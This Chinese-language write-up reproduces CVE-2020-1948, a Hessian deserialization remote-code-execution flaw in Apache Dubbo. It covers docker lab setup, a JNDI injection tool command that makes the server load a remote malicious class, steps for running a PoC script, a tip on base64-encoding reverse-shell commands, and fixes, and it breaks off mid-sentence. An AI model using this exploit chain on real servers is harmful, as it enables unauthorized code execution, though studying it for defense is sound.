Apache Dubbo Provider 远程代码执行漏洞 (CVE-2020-1948)附docker环境

漏洞原理

Dubbo协议默认采用Hessian作为序列化反序列化方式，而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dubbo服务端加载远程恶意类从而执行恶意代码.

影响版本

Apache Dubbo 2.7.0 ~ 2.7.6
Apache Dubbo 2.6.0 ~ 2.6.7
Apache Dubbo 2.5.x 所有版本 (官方不再提供支持)

复现流程

漏洞环境(含利用脚本)

1. 利用docker搭建漏洞环境

//本地创建环境:
cd docker/
docker build -t dubbo:test1 .
docker run -d -p 12345:12345 dubbo:test1
docker logs 容器ID //查看容器是否成功运行
netstat -lntp//查看本地是否有12345端口服务,有代表服务成功开启

2. 开启JNDI 利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “touch /tmp/121” -A 192.168.1.1

-C 要执行的命令
-A 监听IP

执行之后会开启rmi或ldap服务、webserver log,

3. CVE-2020-1948.py

修改 DubboClient ip 为 dubbo provider 服务地址
修改 dataSource 为 JNDI tool 起rmi或ldap服务地址

4. python3运行poc脚本

JNDI的server logs出现访问记录,表示dubbo服务端成功请求了运行在JNDI服务器上的恶意java类
docker exec -it 容器ID//进入容器内部
ls /tmp
发现存在121文件代表执行成功

5. 补充

漏洞环境为版本为dubbo-spring-boot-project-2.7.3,添加rome依赖打成jar后运行,在序列化执行完成后，利用RemotingException抛出异常输出时隐式调用了Rome的toString方法导致RCE

jdk版本为1.8.74//注意高版本jdk会失败建议使用低版本jdk

反弹shell命令注意采用base64加密

修复方案

1. 将dubbo 版本升级到 2.7.7 (2.7.7版本仍存在危险)
2. 更换dubbo协议及反序列化方式
3. 限制出网策略,该漏洞反序列化利用链需要加载远程恶意